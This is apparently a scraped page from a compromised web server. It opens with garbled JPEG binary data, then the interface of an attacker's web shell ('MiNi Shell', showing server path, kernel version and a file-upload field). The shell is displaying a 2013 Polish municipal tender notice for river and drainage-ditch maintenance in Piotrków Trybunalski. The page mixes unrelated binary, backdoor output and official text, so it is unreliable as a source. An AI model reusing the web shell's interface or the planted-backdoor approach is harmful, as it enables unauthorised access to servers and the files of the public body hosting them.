JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130107/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130107/3573-N-2013.html

<p class="kh_header"><b>Piotrków Trybunalski: WYKONANIE USŁUGI: KONSERWACJA RZEK I ROWÓW MELIORACYJNYCH, CZYSZCZENIE OSADNIKÓW WÓD DESZCZOWYCH NA TERENIE MIASTA PIOTRKOWA TRYBUNALSKIEGO</b><br>
<b>Numer ogłoszenia: 3573 - 2013; data zamieszczenia: 07.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg i Utrzymania Miasta , ul. Kasztanowa 31, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 44 7339253, faks 44 7339252.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzdik.piotrkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE USŁUGI: KONSERWACJA RZEK I ROWÓW MELIORACYJNYCH, CZYSZCZENIE OSADNIKÓW WÓD DESZCZOWYCH NA TERENIE MIASTA PIOTRKOWA TRYBUNALSKIEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres rzeczowy obejmuje: 
KONSERWACJĘ RZEK I ROWÓW MELIORACYJNYCH, CZYSZCZENIE OSADNIKÓW WÓD DESZCZOWYCH NA TERENIE MIASTA PIOTRKOWA TRYBUNALSKIEGO tj.: 
   
1.	WYKOSZENIE CHWASTÓW, TRAW  ZE SKARP CIEKÓW POROST GĘSTY TWARDY BEZ   WYGRABIENIA - RĘCZNIE.
2.	WYKOSZENIE  CHWASTÓW, TRAW  POROST GĘSTY  TWARDY RĘCZNIE Z DNA CIEKÓW BEZ  WYGRABIENIA - RĘCZNIE.
3.	WYKOSZENIE  CHWASTÓW, TRAW POROST GĘSTY  TWARDY MECHANICZNIE ZE SKARP I DNA CIEKU.
4.	WYGRABIENIE POROSTÓW ZE SKARP CIEKU.
5.	WYGRABIENIE POROSTÓW Z DNA CIEKU.
6.	WYWÓZ  WYKOSZONYCH POROSTÓW ZE SKARP I DNA.
7.	ODMULENIE CIEKU KOPARKO-ODMULARKAMI NIEZALEŻNIE OD KATEGORII GRUNTU I NACHYLENIA SKARP PRZY SZEROKOŚCI DNA 0,40 M I ZAMULENIU 20 CM.
8.	ODMULENIE CIEKU KOPARKO-ODMULARKAMI NIEZALEŻNIE OD KATEGORII GRUNTU I NACHYLENIA SKARP PRZY SZEROKOŚCI DNA 0,40 M I ZAMULENIU 40 CM.
9.	ODMULENIE CIEKU KOPARKO-ODMULARKAMI NIEZALEŻNIE OD KATEGORII GRUNTU I NACHYLENIA SKARP PRZY SZEROKOŚCI DNA 0,80 M I ZAMULENIU 20 CM.
10.	ODMULENIE CIEKU KOPARKO-ODMULARKAMI NIEZALEŻNIE OD KATEGORII GRUNTU I NACHYLENIA SKARP PRZY SZEROKOŚCI DNA 0,80 M I ZAMULENIU 40 CM.
11.	ODMULENIE CIEKU KOPARKO-ODMULARKAMI NIEZALEŻNIE OD  KATEGORII GRUNTU I NACHYLENIA SKARP PRZY SZEROKOŚCI DNA 1,20 M I ZAMULENIU 20 CM.
12.	ODMULENIE CIEKU KOPARKO-ODMULARKAMI NIEZALEŻNIE OD  KATEGORII GRUNTU I NACHYLENIA SKARP PRZY SZEROKOŚCI DNA 1,20 M I ZAMULENIU 40 CM.
13.	ODMULENIE CIEKU KOPARKO - ODMULARKAMI NIEZALEŻNIE OD KATEGORII GRUNTU I NACHYLENIA SKARP PRZY SZEROKOŚCI DNA 2,00 M I ZAMULENIU 20 CM.
14.	ODMULENIE CIEKU KOPARKO - ODMULARKAMI NIEZALEŻNIE OD KATEGORII GRUNTU I NACHYLENIA SKARP PRZY SZEROKOŚCI DNA 2,00 M I ZAMULENIU 40 CM.
15.	ODMULENIE CIEKU KOPARKO - ODMULARKAMI Z DWÓCH BRZEGÓW NIEZALEŻNIE OD  KATEGORII GRUNTU I NACHYLENIA SKARP PRZY SZEROKOŚCI DNA 0,80 M I ZAMULENIU 20 CM.
16.	ODMULENIE CIEKU KOPARKO - ODMULARKAMI Z DWÓCH BRZEGÓW NIEZALEŻNIE OD  KATEGORII GRUNTU I NACHYLENIA SKARP PRZY SZEROKOŚCI DNA 0,80 M I ZAMULENIU 40 CM.
17.	ODMULENIE CIEKU KOPARKO - ODMULARKAMI Z DWÓCH BRZEGÓW NIEZALEŻNIE OD  KATEGORII GRUNTU I NACHYLENIA SKARP PRZY SZEROKOŚCI DNA 2,80 M I ZAMULENIU 20 CM.
18.	ODMULENIE CIEKU KOPARKO - ODMULARKAMI Z DWÓCH BRZEGÓW NIEZALEŻNIE OD  KATEGORII GRUNTU I NACHYLENIA SKARP PRZY SZEROKOŚCI DNA 2,80 M I ZAMULENIU 40 CM.
19.	ODMULENIE CIEKU KOPARKO - ODMULARKAMI Z DWÓCH BRZEGÓW NIEZALEŻNIE OD  KATEGORII GRUNTU I NACHYLENIA SKARP PRZY SZEROKOŚCI DNA 4,0 M I ZAMULENIU 20 CM.
20.	ODMULENIE CIEKU KOPARKO - ODMULARKAMI Z DWÓCH BRZEGÓW NIEZALEŻNIE OD  KATEGORII GRUNTU I NACHYLENIA SKARP PRZY SZEROKOŚCI DNA 4,0 M I ZAMULENIU 40 CM.
21.	RĘCZNE ODMULENIE DNA O SZEROKOŚCI  0,40 M I ZAMULENIU 20 CM I GŁ. CIEKU DO 1,5 M.
22.	RĘCZNE ODMULENIE DNA O SZEROKOŚCI  0,40 M I ZAMULENIU 40 CM I GŁ. CIEKU DO 1,5 M.
23.	RĘCZNE ODMULENIE DNA O SZEROKOŚCI  0,60 M I ZAMULENIU 20 CM I GŁ. CIEKU DO 1,5 M.
24.	RĘCZNE ODMULENIE DNA O SZEROKOŚCI  0,60 M I ZAMULENIU 40 CM I GŁ. CIEKU DO 1,5 M.
25.	RĘCZNE ODMULENIE DNA O SZEROKOŚCI 1,0 M I ZAMULENIU 20 CM I GŁ. CIEKU DO 1,5 M.
26.	RĘCZNE ODMULENIE DNA O SZEROKOŚCI  1,0 M I ZAMULENIU 40 CM I GŁ. CIEKU DO 1,5 M.
27.	ROZPLANTOWANIE UROBKU PO MECHANICZNYM ODMULENIU CIEKU PRZY SZEROKOŚCI DNA 0,80 M GR. ZAMUL. 20 CM.
28.	ROZPLANTOWANIE UROBKU PO MECHANICZNYM ODMULENIU CIEKU PRZY SZEROKOŚCI DNA 0,80 M GR. ZAMUL. 40 CM.
29.	ROZPLANTOWANIE UROBKU PO MECHANICZNYM ODMULENIU CIEKU PRZY SZEROKOŚCI DNA 1,20 M GR. ZAMUL. 20 CM.
30.	ROZPLANTOWANIE UROBKU PO MECHANICZNYM ODMULENIU CIEKU PRZY SZEROKOŚCI DNA 1,20 M GR. ZAMUL. 20 CM.
31.	ROZPLANTOWANIE UROBKU PO MECHANICZNYM ODMULENIU CIEKU PRZY SZEROKOŚCI DNA 2,0 M GR. ZAMUL. 20 CM.
32.	ROZPLANTOWANIE UROBKU PO MECHANICZNYM ODMULENIU CIEKU PRZY SZEROKOŚCI DNA 2,0 M GR. ZAMUL. 40 CM.
33.	ROZPLANTOWANIE UROBKU PO MECHANICZNYM ODMULENIU CIEKU PRZY SZEROKOŚCI DNA 2,80 M GR. ZAMUL.20 CM.
34.	ROZPLANTOWANIE UROBKU PO MECHANICZNYM ODMULENIU CIEKU PRZY SZEROKOŚCI DNA 2,80 M GR. ZAMUL. 40 CM.
35.	ROZPLANTOWANIE UROBKU PO MECHANICZNYM ODMULENIU CIEKU PRZY SZEROKOŚCI DNA 4,0 M GR. ZAMUL. 20 CM.
36.	ROZPLANTOWANIE UROBKU PO MECHANICZNYM ODMULENIU CIEKU PRZY SZEROKOŚCI DNA 4,0 M GR. ZAMUL. 40 CM.
37.	OCZYSZCZENIE Z NAMUŁU PRZEPUSTÓW  RUROWYCH Z ROZPLANTOWANIEM  PRZY ŚREDNICY 40 CM I ZAMULENIU 1/2 ŚREDNICY.
38.	OCZYSZCZENIE Z NAMUŁU PRZEPUSTÓW RUROWYCH Z ROZPLANTOWANIEM  PRZY ŚREDNICY 60 CM  I ZAMULENIU 1/2 ŚREDNICY.
39.	OCZYSZCZENIE Z NAMUŁU PRZEPUSTÓW  RUROWYCH Z ROZPLANTOWANIEM  PRZY ŚREDNICY 80 CM I ZAMULENIU 1/2 ŚREDNICY.
40.	OCZYSZCZENIE Z NAMUŁU PRZEPUSTÓW  RUROWYCH Z ROZPLANTOWANIEM  PRZY ŚREDNICY 100 CM I ZAMULENIU 1/2 ŚREDNICY.
41.	OCZYSZCZENIE Z NAMUŁU PRZEPUSTÓW  RUROWYCH Z ROZPLANTOWANIEM  PRZY ŚREDNICY 120 CM  I ZAMULENIU 1/2 ŚREDNICY.
42.	OCZYSZCZENIE Z NAMUŁU PRZEPUSTÓW  RUROWYCH Z ROZPLANTOWANIEM  PRZY ŚREDNICY 150 CM I ZAMULENIU 1/2 ŚREDNICY.
43.	MECHANICZNIE OCZYSZCZENIE OSADNIKÓW Z NAMUŁÓW ZNAJDUJĄCYCH SIĘ NA CIEKACH - Z WYWOZEM NAMUŁU NA ODL. 5 KM.
44.	OCZYSZCZENIE KORYTA RZEKI, ROWU ZE ŚMIECI I INNYCH ZANIECZYSZCZEŃ ORAZ LIKWIDACJA ZATORÓW Z WYWOZEM NA SKŁADOWISKO ODPADÓW.
45.	ROZBIÓRKA BRUKU Z PREFABRYKATÓW BETONOWYCH GRUBOŚCI 15CM.
46.	ROZBIÓRKA KONSTRUKCJI BETONOWYCH I ŻELBETOWYCH Z WYWOZEM NA SKŁADOWISKO ODPADÓW.
47.	ROZBIÓRKA RUROCIĄGÓW O ŚREDNICY 40 CM.
48.	ROZBIÓRKA RUROCIĄGÓW O ŚREDNICY 60 CM.
49.	ROZBIÓRKA RUROCIĄGÓW O ŚREDNICY 100 CM.
50.	ROZBIÓRKA UMOCNIEŃ Z KISZEK FASZYNOWYCH O ŚRED. 20 CM.
51.	UBEZPIECZENIE STOPY SKARP KISZKĄ FASZYNOWĄ O ŚRED. 20CM W GR. KAT. III.
52.	WYMIANA RUR W PRZEPUSTACH - WYDOBYCIE USZKODZONEJ RURY, ZAŁOŻENIE NOWEJ RURY. ZABEZPIECZENIE  STYKÓW PAPĄ I BETONEM PRZY ŚRED. RURY 60 CM.
53.	WYMIANA RUR W PRZEPUSTACH - WYDOBYCIE USZKODZONEJ RURY, ZAŁOŻENIE NOWEJ RURY ZABEZPIECZENIE  STYKÓW PAPĄ I BETONEM PRZY ŚRED. RURY 80 CM.
54.	WYMIANA RUR W PRZEPUSTACH-WYDOBYCIE USZKODZONEJ RURY, ZAŁOŻENIE NOWEJ RURY ZABEZPIECZENIE STYKÓW PAPĄ I BETONEM PRZY ŚRED. RURY 100 CM.
55.	NAPRAWA SKARP POPRZEZ OBSIEW MIESZANKĄ TRAW - SPULCHNIENIE POWIERZCHNI 
I WYSIEW NASION.
56.	NAPRAWA RUROCIĄGU Z PCV ŁĄCZONY NA WCISK O ŚREDNICY ZEWNĘTRZNEJ 315 MM.
57.	NAPRAWA STUDZIENKI ŚCIEKOWEJ ULICZNEJ BETONOWEJ O ŚREDNICY 500 MM 
Z OSADNIKIEM BEZ SYFONU.
58.	NAPRAWA STUDZIENKI ŚCIEKOWEJ ULICZNEJ BETONOWEJ O ŚREDNICY 1000 MM Z OSADNIKIEM BEZ SYFONU.
59.	WYKONANIE PODSYPEK Z TŁUCZNIA KAMIENNEGO GR. 20 CM.
60.	WYKONANIE PODSYPEK Z POSPÓŁKI GR. 10 CM.
61.	PRZEKŁADANIE RUROCIĄGÓW DRENARSKICH O ŚR. 5 - 10 CM.
62.	UMOCNIENIE SKARP I DNA CIEKÓW ELEMENTAMI PREFABRYKOWANYMI, WYKONANIE PODSYPKI GR.10 CM, UŁOŻENIE PŁYT WYPEŁNIENIE SZCZELIN ZAPRAWĄ CEMENTOWĄ.
63.	UMOCNIENIE SKARP I DNA CIEKÓW ELEMENTAMI PREFABRYKOWANYMI, WYKONANIE PODSYPKI Z ZAPRAWĄ CEMENTOWĄ GR.10 CM, UŁOŻENIE PŁYT WYPEŁNIENIE SZCZELIN ZAPRAWĄ CEMENTOWĄ.
64.	WYKOP ROWU MECHANICZNIE O SZER.DNA 0,4 - 1,0 M NACHYLENIE SKARP 1 DO 1 GR.KAT.III.
65.	WYKOP ROWU MECHANICZNIE O SZER.DNA 0,4 -1,0 M NACHYLENIE SKARP 1 DO 1,5 GR.KAT.III.
66.	ZAŁADUNEK KOPARKĄ O POJ. ŁYŻKI 0,25 M3, GRUNT KAT. I-II, TRANSPORT UROBKU SAMOCHODAMI SAMOWYŁADOWCZYMI  NA  ODLEGŁOŚĆ DO 7 KM.
67.	RĘCZNE ODSPOJENIE GRUNTU SZEROKOŚCI  DNA DO 1,5 M GŁĘBOKOŚĆ  WYKOPU DO 1,5 M, KAT. GRUNTU III.
68.	MECHANICZNE  ODSPOJENIE GRUNTU  KOPARKAMI PODSIĘBIERNYMI  Z TRANSPORTEM UROBKU SAMOCHODAMI SAMOWYŁADOWCZYMI  NA  ODLEGŁOŚĆ DO 1 KM, KOPARKI O POJ. ŁYŻKI 0,25 M3,  GRUNT KAT. I-II. 
69.	MECHANICZNE ROZPLANTOWANIE ZIEMI WARSTWĄ GR.20 CM WYDOBYTEJ Z WYKOPU GR. KAT. I-II.
70.	MECHANICZNE ZASYPANIE WYKOPÓW GR. KAT.III.
71.	MECHANICZNE ZASYPANIE WYKOPÓW GR. KAT.III Z TRANSPORTEM ZIEMI Z ODL.5 KM.
72.	RĘCZNE ZASYPANIE WYKOPÓW GR. KAT.III.
73.	RĘCZNE  ŚCINANIE  KRZAKÓW ,ZAGAJNIKÓW Z WYWOZEM ODPADÓW.
74.	ŚCINANIE DRZEW PIŁĄ MECHANICZNĄ O ŚRED. 10 - 15 CM Z WYWOZEM ODPADÓW.

W ramach w/w prac, Wykonawca zobowiązany jest do:
- 	Usunięcia w trakcie realizacji prac wszelkiego rodzaju odpadów poza pas drogowy lub inne miejsce wskazane przez zamawiającego. Odpady stanowią własność Wykonawcy (koszty wszelkich działań wynikających z ustawy o odpadach, obciążają Wykonawcę).
- 	Zabezpieczenia terenu prac na czas wykonania usługi zgodnie z wymaganymi przepisami oraz  pokrycia kosztów z tym związanych.
- 	Przeniesienia na swój koszt znaków osnowy geodezyjnej w przypadku, gdy ww. znaki znajdują się na terenie realizowanych prac po uprzednim uzgodnieniu z Referatem Geodezji, Kartografii i Katastru Urzędu Miasta ul. Szkolna 28 w Piotrkowie Trybunalskim. 
-	Wykonania inwentaryzacji po wykonawczej uzbrojenia infrastruktury technicznej i naniesienia jej na mapy sytuacyjno-wysokościowe.
- 	Poniesienia wszelkich kosztów z tytułu inwentaryzacji po wykonawczej uzbrojenia infrastruktury technicznej i naniesienia jej na mapy sytuacyjno - wysokościowe, potwierdzonych przez Referat Geodezji i Kartografii i Katastru Urzędu Miasta ul. Szkolna 28.
-	Wszystkie usługi należy wykonywać z zachowaniem obowiązujących przepisów BHP.

UWAGA !
-	Powyższa usługa będzie realizowana sukcesywnie, na każdorazowe pisemne lub telefoniczne zlecenie Zamawiającego.
-	Zakres usługi i ceny jednostkowe określa załączony do SIWZ formularz cenowy.
-	Zamawiający zastrzega sobie prawo zmiany pomiędzy zakresem i ilością wykonanych usług w stosunku do tego, co zostało określone w formularzu cenowym. Realizacja usługi będzie następowała na podstawie bieżących potrzeb Zamawiającego i wg cen jednostkowych w nim podanych, które są  niezmienne przez cały okres obowiązywania umowy, przy czym wartość przedmiotu umowy nie przekroczony kwoty, o której mowie w § 4 ust. 6 umowy. Wykonawcy nie przysługuje takim przypadku wobec Zamawiającego roszczenie odszkodowawcze z tytułem wykonania mniejszej ilości usług, w stosunku do tego co zostało określone w formularzu cenowym, określającym zakres usługi oraz ceny jednostkowe..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do wysokości 50% zamówienia podstawowego, o których mowa w art. 67 ust.1 pkt 6 ustawy Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 71.31.11.00-2, 90.72.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium.
Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 8.900,00 zł 
(słownie: osiem tysięcy dziewięćset złotych 00/100) przed upływem terminu składania ofert.
Wadium może być wnoszone w następujących formach :
-	pieniądzu;
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
-	gwarancjach bankowych;
-	gwarancjach ubezpieczeniowych;
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.)

UWAGA - Wadium wnoszone w postaci poręczeń i gwarancji bankowych, poręczeń kasy oszczędnościowo - kredytowej lub gwarancji ubezpieczeniowej należy załączyć do oferty w formie kopii dokumentu, a oryginał złożyć w oddzielnej kopercie oznaczonej ORYGINAŁ WADIUM, która będzie załączona do oferty (wewnątrz opakowania oferty).
Uwaga !
W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczeń, mają być one bezwarunkowe, nieodwołalne i płatne w ciągu 14 dni na pierwsze pisemne żądanie Zamawiającego, wykonalne na terytorium Rzeczypospolitej Polskiej, sporządzone zgodnie z obowiązującym prawem i mają zawierać następujące elementy:
1. 	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji - poręczenia (Zamawiającego), gwaranta - poręczyciela (banku lub instytucji ubezpieczeniowej udzielających gwarancji - poręczenia) oraz wskazanie ich siedzib, 
2. 	określenie wierzytelności, która ma być zabezpieczona gwarancją (poręczeniem), 
3. 	kwotę gwarancji (poręczenia), 
4. 	termin ważności gwarancji (poręczenia),
5. 	zobowiązanie gwaranta do: zapłacenia kwoty gwarancji (poręczenia) w ciągu 14 dni na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż: 
a) 	Wykonawca którego ofertę wybrano:
- odmówił podpisania umowy na warunkach określonych w ofercie, lub 
- nie wniósł zabezpieczenia należytego wykonania umowy, lub
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
b) 	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy PZP, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy PZP, lub pełnomocnictw, nie udowadniając, że wynika to z przyczyn nie leżących po jego stronie.

Uwaga!
Wadium wnoszone w formie pieniężnej wpłaca się przelewem na rachunek bankowy Zamawiającego:
Getin Noble Bank S.A.  
Nr  r-ku: 30 1560 0013 2326 8572 1000 0003

Wadium musi wpłynąć na wskazany rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy  bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert.

UWAGA: 
Na poleceniu przelewu należy zamieścić adnotację: Wadium w przetargu nieograniczonym na: WYKONANIE USŁUGI: KONSERWACJA RZEK I ROWÓW MELIORACYJNYCH, CZYSZCZENIE OSADNIKÓW WÓD DESZCZOWYCH NA TERENIE MIASTA PIOTRKOWA TRYBUNALSKIEGO

Oferta nie zabezpieczona akceptowalną formą wadium zostanie wykluczona z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 2 pkt. 4 ustawy Prawo Zamówień Publicznych z dnia 29 stycznia 2004 roku (tekst jednolity: Dz. U. z 2010 roku Nr 113 poz. 759 ze zm.).

Zwrot i zatrzymanie wadium dokonany zostanie zgodnie zapisami art. 46 ustawy PZP 
z dnia 29 stycznia 2004 roku (tekst jednolity: Dz. U. z 2010 roku Nr 113 poz. 759 
ze zm.) tj:
1.	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4a.
1a.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
2.	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert
3.	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie ust. 1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
4.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
4a.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
5.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
